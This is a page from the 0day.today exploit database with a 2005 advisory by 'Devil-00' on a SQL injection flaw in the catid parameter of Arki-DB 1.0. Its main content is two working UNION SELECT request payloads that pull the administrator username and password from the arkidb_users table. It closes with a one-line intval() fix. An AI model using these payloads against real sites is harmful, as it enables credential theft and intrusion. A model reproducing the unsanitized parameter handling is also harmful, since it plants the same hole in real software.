[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities

Author
Devil-00
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-201
Category
web applications
Date add
14-11-2005
Platform
unsorted
========================================================
Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities
========================================================




[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's 
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] devil-00@s4a.cc
[~] 
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By  Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~]   Devil-00
[~]   www.s4a.cc << We Love You
[~]   www.securitygurus.net << Love you 2 :P
[~]   HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~]  [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1    
[~]
[~]  [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~]  Line 75 .. File /source/view.php
[~]  
[~]   $catid = $this->get('catid');
[~] Change To
[~]   $catid = intval($this->get('catid'));
[~]---------------------------------------------------------------------------------------------------------- 



#  0day.today [2024-11-16]  #